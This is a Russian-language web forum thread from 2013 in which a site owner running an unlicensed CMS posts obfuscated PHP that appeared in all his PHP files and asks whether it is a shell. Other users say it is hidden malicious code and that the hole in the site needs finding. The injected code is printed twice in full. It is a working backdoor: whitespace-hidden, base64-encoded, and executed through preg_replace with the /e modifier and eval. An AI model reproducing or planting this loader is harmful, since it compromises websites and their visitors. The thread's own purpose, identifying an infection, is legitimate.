Шелл или нет?

~~Landver~~ · 26.05.2013, 19:56

в стресе во всех файлах php внутри появились вот такие цифры

Код HTML:

<?php                                                                                                                                                                 /*versio:2.19*/$I1I1=93284;if (!function_exists('Il11lIlI')){$GLOBALS['I1I1'] = '}qsY3VybA;X2luaXQU*YWxsb3dfdXJsX2ZvcGVu_=PlMQaHR0cDovLwqS(pJndheT1maWxlX2dldF9jb250ZW50cwfX3NldG9wdAwX2V4ZWM)rJndheT1jdXJssy#}uW;iLweb3Nvbi5pbgcnllcGR4LmNvbQcGhwYWlkZS5jb20qhldwvWV8pMOgjNZGlzcGxheV9lcnJvcnMaJ_CZGV0ZXJtaW5hdG9yZnRwMTM&~$kMi4xOQY#XSTFJbElJSTFJnYmFzZTY0X2RlY29kZQfYmFzZTY0X2VuY29kZQvC SFRUUFMb2ZmaHR0cHM6Ly8njuj(SFRUUF9IT1NU?ZRdW5pb24rJc2VsZWN0qV;mqUkVRVUVTVF9VUkkQp~U0NSSVBUX05BTUUHE@UVVFUllfU1RSSU5HKHVPwNL3RtcC8uZm9udC11bml4HL3RtcC8uSUNFLXVuaXgLPN=VE1Qo^VEVNUAVE1QRElSr*}WCmL3RtcAmFVreQdXBsb2FkX3RtcF9kaXIqDfdG1w}$HQ}dd3AtY29udGVudC91cGxvYWRzf(VBd3AtY29udGVudC9jYWNoZQLgG{H(dmVyc2lvLQaLXBocAdVSFRUUF9FWEVDUEhQtapFb3V0b2ssSFRUUF9VU0VSX0FHRU5UCOyLAPhZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXg.ZL3BnLnBocD91PQGzpJms9JnQ9cGhwJnA9RIJnY9ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlZ3dFA0bGdVL2l0WFlreWJkTHE5TGVVeGJqY1FCOWNtTGhYRVNTWU9hUmk0YURPbE5hV3NZNHovZmMrNWo5NmloZDBkSnhIdmViKytjMGpXeERoWnNYV1NzWlhSV3JHU0Zac2tXNVI1MFRMTlY3TGVaY3N5eVROU3A4UnJscStOMHpDbFlScGE1T3gwRWtWT05DRUJHZDlkWDV2a2xlaVhUYklzOGpMWk1LTXNkc3c4SndVcmQwVkc2aXJnOVUxYmVtRGxPa2taRU1Nd1JmMm5FMUFWUmVBTlBGRWFocUFXQkdrS29vWm5rUTdJQTg4a21qaEFrVHgyeFVFZGkzU0JaWkJrU2J4bHBhRXBmWXU0am1rUkN1UUVFc0ZaSGhwWVRCTFViTGJCcUd1S09CMzBMUmlneHlnWkwvT3NaRm01MVNyYVBoaHdUR0lUR1JGK0VpSFpXcWNQaGp3d1ZDVklxc2JVc0hUTDBEMlZvcGo5U3JaZ1FnWnRxc3hRek14QXZocVlsWkNDUGRxVWxiN0R2VHJubEpSTE5tU095dFJKUllZMFk1R0x1K2wxZERPTDRaZEYvbWVvRkN0Q1hmT280cXZSOE10b2FxMFhFUHRSeHVsb2RqY2R6NmJEOGUwbENNZ3VPOHgvRVkzSG80dlpMUHhyRk4zTkxPS0xIS1Nweko1SWg1SkRWY3Rka2NiTE5OK3kyaXZXZzIyZXloZERDa01WdEJvZHE5dXhDS1Q1clNxcjRGRmx4UjRTUTRERzE5dDgrVE4vWXBsdS9wNkRBd0FGamZnSFp3TC9oTlBvZ1JvZ3JvYUdCNHlUL1FHRmtOWlBPK3dmTmNHdFAwY3o4aW9yOVhiMnZIZ0owQk5Xa3F2WjdPWTNhanZmaSsvWlZiNHRQNU5YNmRvYlByWGs2RUd2Z3ZLYnE1czR1cTMxaitmZ29OajQvblUwdlEyamNZUHR1eTByUGcwZllHZytjeDlRR1ZldUREdy9JaHljSEVFZ0daOUp6czZJOFE1eHlDZE4vaDI4MFpteU1lTXdzelZucU52allEUllxM29yZ0RybGJZSHBaYitlMG56RmpGYmxvNlZVQXQ4dVE0aVIzUGZPWEE5MHNtbVVRejV1RTM5dzZDY2N4b1pGc1hpcDRaRG44ZEdxRFJ0RkdLTHR2U2UvQzA4K1RsWUZwODlGVWpLRWlzaHhIRXY4bmtBV1ZQdUFLTUNYYURySnBQVjFmWTUwd0Q1WVMwVkNwRkowdnBjcm9NaFlLdnY1cm9TQ0l4VzE4bHFCRFVSenRuek1hNzUzZTRDQXBpMFphMTNVNDNCclMwR2I1Ni9GcS9RUjBYdVlnTDRwMmw2c05VMTFPZkIwSk9DRFBraDFGR2d5amt0WFVNQ1NVNk40WGJWbWNFSW1OVXE3dzdHTU53ak1CYTJSRU5KcGo1TlNSTllhQ1dPVkpENU13WHNJRmVPZGJIa3p4YmVqS2N6UHZaYnY5OUhUdVNuck9Eak1RazdxeTlJQmI5dHlYK3piOVhodXFLeWVKTnZCdGl6S1BNMmZXZEZreEhORjlOamw2N3hnaStVak5GV01hTExZRWxuSjRBOWRjblFXVkQ3bHVMejRvMjQycjgyM0RlSW9hcmlYNG5QdG93WlR0UkVQNnZJaG10NS8wL1VHWGhrbmgxTHRkVHcrVW5PeDd3L1QrZkw0U081UlFjYUNOcVlRNndROU9mODM5WGI5QUtFOUhBbllyc2MwaWxMeU9aOXdCQXhVV1p1a3FqZzVRQ0tjQllQTnlsZWJTSTZmWTB1UWw1TWdXeGc0Z2xWU1pBdEEzVGkrREs5SGNXemFYOElwYk5wbytnMnMzUXluUS9nb2RoSDhyeUN1RnBWTDVUMm1uOXF1bk9jR2w5c2RIN3Q1M2t6c1VoeFpRUnlOdng0UTI2ZDB1OWcxalJTbFRULzErWk5GUGg2TnZ1TnhyMDFMSlVlam1lOXk2MDBVRDhHMm1ZVEZjVjBnN1EyYXpDU09HaFRZaWRTRW5jakRSRDVpUmNWSE8yZ3NpVGg5dHpFaS9PSUhudDQxU2VFTG5vZmk4Wno4QVBzL3E0MVZicDZDanc3M2ZJSFpvcFBPMzZGVUM4K0srRnM4dkp0ZHRlWkJJTm5VVGxBSVA1QzdvM1lrVXl5UVdpSk96U0EydlZnU0NPcWEwSEZjTEpPNmx6Q0V5U1NRWU4wMGtCMjVKRGk0RHRqZmkxUkpnWTdqN25YdzN0bGJ5QjJ2alV1Tm95b2M3YVhoOEk4cTRlSjdEbVNRMnlyejNmSlIvTW0vclN6VDNZckZlYlprNmxFQW55Z256dk1BTGxPV0xmR3FrRTlpMjhDODhudnlPSHAzdkI2ZnR6MzBWdGVONXVyZ1ZPNEZoUVBrdzVVaFFSNEk2VHRzRnk1WUZmVWtDQzc1SlMvM1ZTMVUzcDJPaElUS1J0ZDErWEZqeTdoMFFidGVINU9zV3F0RzRQZFFVdzkwOFN4cXF3dkNFYnNhRmdJWXJMNXNpc01MRGpiOWZmUDhYVW5lOWpzZmZ2NEJSWHN0M2c9PSIpKSk7cHJlZ19yZXBsYWNl)m';function Il11lIlI($a, $b){$c=$GLOBALS['I1I1']; $d=pack('H*','626173'.'6536345f6465636f6465'); return $d(substr($c, $a, $b));};$Il1111I1I = Il11lIlI(3393, 16);$Il1111I1I("/QO00QO0QQ/e", Il11lIlI(761, 2632), "QO00QO0QQ");};?><?php

***helly*** · 26.05.2013, 19:58

Обратиться к разрабам, не?

~~Landver~~ · 26.05.2013, 20:07

не лицензия просто

***darkevil*** · 26.05.2013, 20:09

Цитата:

Сообщение от Landver

в стресе во всех файлах php внутри появились вот такие цифры

Код HTML:

<?php                                                                                                                                                                 /*versio:2.19*/$I1I1=93284;if (!function_exists('Il11lIlI')){$GLOBALS['I1I1'] = '}qsY3VybA;X2luaXQU*YWxsb3dfdXJsX2ZvcGVu_=PlMQaHR0cDovLwqS(pJndheT1maWxlX2dldF9jb250ZW50cwfX3NldG9wdAwX2V4ZWM)rJndheT1jdXJssy#}uW;iLweb3Nvbi5pbgcnllcGR4LmNvbQcGhwYWlkZS5jb20qhldwvWV8pMOgjNZGlzcGxheV9lcnJvcnMaJ_CZGV0ZXJtaW5hdG9yZnRwMTM&~$kMi4xOQY#XSTFJbElJSTFJnYmFzZTY0X2RlY29kZQfYmFzZTY0X2VuY29kZQvC SFRUUFMb2ZmaHR0cHM6Ly8njuj(SFRUUF9IT1NU?ZRdW5pb24rJc2VsZWN0qV;mqUkVRVUVTVF9VUkkQp~U0NSSVBUX05BTUUHE@UVVFUllfU1RSSU5HKHVPwNL3RtcC8uZm9udC11bml4HL3RtcC8uSUNFLXVuaXgLPN=VE1Qo^VEVNUAVE1QRElSr*}WCmL3RtcAmFVreQdXBsb2FkX3RtcF9kaXIqDfdG1w}$HQ}dd3AtY29udGVudC91cGxvYWRzf(VBd3AtY29udGVudC9jYWNoZQLgG{H(dmVyc2lvLQaLXBocAdVSFRUUF9FWEVDUEhQtapFb3V0b2ssSFRUUF9VU0VSX0FHRU5UCOyLAPhZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXg.ZL3BnLnBocD91PQGzpJms9JnQ9cGhwJnA9RIJnY9ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlZ3dFA0bGdVL2l0WFlreWJkTHE5TGVVeGJqY1FCOWNtTGhYRVNTWU9hUmk0YURPbE5hV3NZNHovZmMrNWo5NmloZDBkSnhIdmViKytjMGpXeERoWnNYV1NzWlhSV3JHU0Zac2tXNVI1MFRMTlY3TGVaY3N5eVROU3A4UnJscStOMHpDbFlScGE1T3gwRWtWT05DRUJHZDlkWDV2a2xlaVhUYklzOGpMWk1LTXNkc3c4SndVcmQwVkc2aXJnOVUxYmVtRGxPa2taRU1Nd1JmMm5FMUFWUmVBTlBGRWFocUFXQkdrS29vWm5rUTdJQTg4a21qaEFrVHgyeFVFZGkzU0JaWkJrU2J4bHBhRXBmWXU0am1rUkN1UUVFc0ZaSGhwWVRCTFViTGJCcUd1S09CMzBMUmlneHlnWkwvT3NaRm01MVNyYVBoaHdUR0lUR1JGK0VpSFpXcWNQaGp3d1ZDVklxc2JVc0hUTDBEMlZvcGo5U3JaZ1FnWnRxc3hRek14QXZocVlsWkNDUGRxVWxiN0R2VHJubEpSTE5tU095dFJKUllZMFk1R0x1K2wxZERPTDRaZEYvbWVvRkN0Q1hmT280cXZSOE10b2FxMFhFUHRSeHVsb2RqY2R6NmJEOGUwbENNZ3VPOHgvRVkzSG80dlpMUHhyRk4zTkxPS0xIS1Nweko1SWg1SkRWY3Rka2NiTE5OK3kyaXZXZzIyZXloZERDa01WdEJvZHE5dXhDS1Q1clNxcjRGRmx4UjRTUTRERzE5dDgrVE4vWXBsdS9wNkRBd0FGamZnSFp3TC9oTlBvZ1JvZ3JvYUdCNHlUL1FHRmtOWlBPK3dmTmNHdFAwY3o4aW9yOVhiMnZIZ0owQk5Xa3F2WjdPWTNhanZmaSsvWlZiNHRQNU5YNmRvYlByWGs2RUd2Z3ZLYnE1czR1cTMxaitmZ29OajQvblUwdlEyamNZUHR1eTByUGcwZllHZytjeDlRR1ZldUREdy9JaHljSEVFZ0daOUp6czZJOFE1eHlDZE4vaDI4MFpteU1lTXdzelZucU52allEUllxM29yZ0RybGJZSHBaYitlMG56RmpGYmxvNlZVQXQ4dVE0aVIzUGZPWEE5MHNtbVVRejV1RTM5dzZDY2N4b1pGc1hpcDRaRG44ZEdxRFJ0RkdLTHR2U2UvQzA4K1RsWUZwODlGVWpLRWlzaHhIRXY4bmtBV1ZQdUFLTUNYYURySnBQVjFmWTUwd0Q1WVMwVkNwRkowdnBjcm9NaFlLdnY1cm9TQ0l4VzE4bHFCRFVSenRuek1hNzUzZTRDQXBpMFphMTNVNDNCclMwR2I1Ni9GcS9RUjBYdVlnTDRwMmw2c05VMTFPZkIwSk9DRFBraDFGR2d5amt0WFVNQ1NVNk40WGJWbWNFSW1OVXE3dzdHTU53ak1CYTJSRU5KcGo1TlNSTllhQ1dPVkpENU13WHNJRmVPZGJIa3p4YmVqS2N6UHZaYnY5OUhUdVNuck9Eak1RazdxeTlJQmI5dHlYK3piOVhodXFLeWVKTnZCdGl6S1BNMmZXZEZreEhORjlOamw2N3hnaStVak5GV01hTExZRWxuSjRBOWRjblFXVkQ3bHVMejRvMjQycjgyM0RlSW9hcmlYNG5QdG93WlR0UkVQNnZJaG10NS8wL1VHWGhrbmgxTHRkVHcrVW5PeDd3L1QrZkw0U081UlFjYUNOcVlRNndROU9mODM5WGI5QUtFOUhBbllyc2MwaWxMeU9aOXdCQXhVV1p1a3FqZzVRQ0tjQllQTnlsZWJTSTZmWTB1UWw1TWdXeGc0Z2xWU1pBdEEzVGkrREs5SGNXemFYOElwYk5wbytnMnMzUXluUS9nb2RoSDhyeUN1RnBWTDVUMm1uOXF1bk9jR2w5c2RIN3Q1M2t6c1VoeFpRUnlOdng0UTI2ZDB1OWcxalJTbFRULzErWk5GUGg2TnZ1TnhyMDFMSlVlam1lOXk2MDBVRDhHMm1ZVEZjVjBnN1EyYXpDU09HaFRZaWRTRW5jakRSRDVpUmNWSE8yZ3NpVGg5dHpFaS9PSUhudDQxU2VFTG5vZmk4Wno4QVBzL3E0MVZicDZDanc3M2ZJSFpvcFBPMzZGVUM4K0srRnM4dkp0ZHRlWkJJTm5VVGxBSVA1QzdvM1lrVXl5UVdpSk96U0EydlZnU0NPcWEwSEZjTEpPNmx6Q0V5U1NRWU4wMGtCMjVKRGk0RHRqZmkxUkpnWTdqN25YdzN0bGJ5QjJ2alV1Tm95b2M3YVhoOEk4cTRlSjdEbVNRMnlyejNmSlIvTW0vclN6VDNZckZlYlprNmxFQW55Z256dk1BTGxPV0xmR3FrRTlpMjhDODhudnlPSHAzdkI2ZnR6MzBWdGVONXVyZ1ZPNEZoUVBrdzVVaFFSNEk2VHRzRnk1WUZmVWtDQzc1SlMvM1ZTMVUzcDJPaElUS1J0ZDErWEZqeTdoMFFidGVINU9zV3F0RzRQZFFVdzkwOFN4cXF3dkNFYnNhRmdJWXJMNXNpc01MRGpiOWZmUDhYVW5lOWpzZmZ2NEJSWHN0M2c9PSIpKSk7cHJlZ19yZXBsYWNl)m';function Il11lIlI($a, $b){$c=$GLOBALS['I1I1']; $d=pack('H*','626173'.'6536345f6465636f6465'); return $d(substr($c, $a, $b));};$Il1111I1I = Il11lIlI(3393, 16);$Il1111I1I("/QO00QO0QQ/e", Il11lIlI(761, 2632), "QO00QO0QQ");};?><?php

Если "появились" то явно не ветром надуло. Если в изначальном варианте небыло, то пора бить тревогу.

***Mafio*** · 26.05.2013, 20:14

Цитата:

Сообщение от Landver

не лицензия просто

ну так сами себе гемморой и находите.... халявы не бывает

~~Landver~~ · 26.05.2013, 20:21

просто хотел узнать что за буквы и цифры и откуда они.

***epmak*** · 26.05.2013, 20:29

обфускация кода.
причем весьма оригинальна. смысл в том, что есть "зашифрованные куски" кода ,которые попеременно дергаются.

на самом деле, оч занимательно.

***darkevil*** · 26.05.2013, 20:30

Цитата:

Сообщение от Landver

просто хотел узнать что за буквы и цифры и откуда они.

Ничего хорошего они не значат, обычно так скрывают шеллы особенно если код очень далеко от <php явно был умысел "скрыть" чтобы не сразу обнаружили.

Ищите дырку в сайте.

***epmak*** · 26.05.2013, 20:37

частично снял обфускацию(~50%, мб чуть больше), много ини сетов ини гетов, обращений к сервер массиву..
сокеты...

сильно похоже на шеллку + какие то куски веба там убраны

~~Landver~~ · 26.05.2013, 20:40

Есть какой нибудь софт на проверку шелла? был 1 сайт но потерял.

26.05.2013, 19:58	#2
*helly* Супергерой Регистрация: 27.03.2012 Сообщений: 2,842 Отблагодарили 1,767 раз(а) Рейтинг мнений: 314	Re: Шелл или нет? Обратиться к разрабам, не?

26.05.2013, 20:07	#3
~~Landver~~ Изгнанные Регистрация: 18.10.2012 Возраст: 39 Сообщений: 220 Отблагодарили 0 раз(а) Рейтинг мнений:	Re: Шелл или нет? не лицензия просто

26.05.2013, 20:21	#6
~~Landver~~ Изгнанные Регистрация: 18.10.2012 Возраст: 39 Сообщений: 220 Отблагодарили 0 раз(а) Рейтинг мнений:	Re: Шелл или нет? просто хотел узнать что за буквы и цифры и откуда они.

26.05.2013, 20:29	#7
*epmak* aka Lexa Регистрация: 15.02.2013 Адрес: планета Земля Сообщений: 604 Отблагодарили 65 раз(а) Рейтинг мнений: 176	Re: Шелл или нет? обфускация кода. причем весьма оригинальна. смысл в том, что есть "зашифрованные куски" кода ,которые попеременно дергаются. на самом деле, оч занимательно. __________________ Блог

26.05.2013, 20:37	#9
*epmak* aka Lexa Регистрация: 15.02.2013 Адрес: планета Земля Сообщений: 604 Отблагодарили 65 раз(а) Рейтинг мнений: 176	Re: Шелл или нет? частично снял обфускацию(~50%, мб чуть больше), много ини сетов ини гетов, обращений к сервер массиву.. сокеты... сильно похоже на шеллку + какие то куски веба там убраны __________________ Блог

26.05.2013, 20:40	#10
~~Landver~~ Изгнанные Регистрация: 18.10.2012 Возраст: 39 Сообщений: 220 Отблагодарили 0 раз(а) Рейтинг мнений:	Re: Шелл или нет? Есть какой нибудь софт на проверку шелла? был 1 сайт но потерял.

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)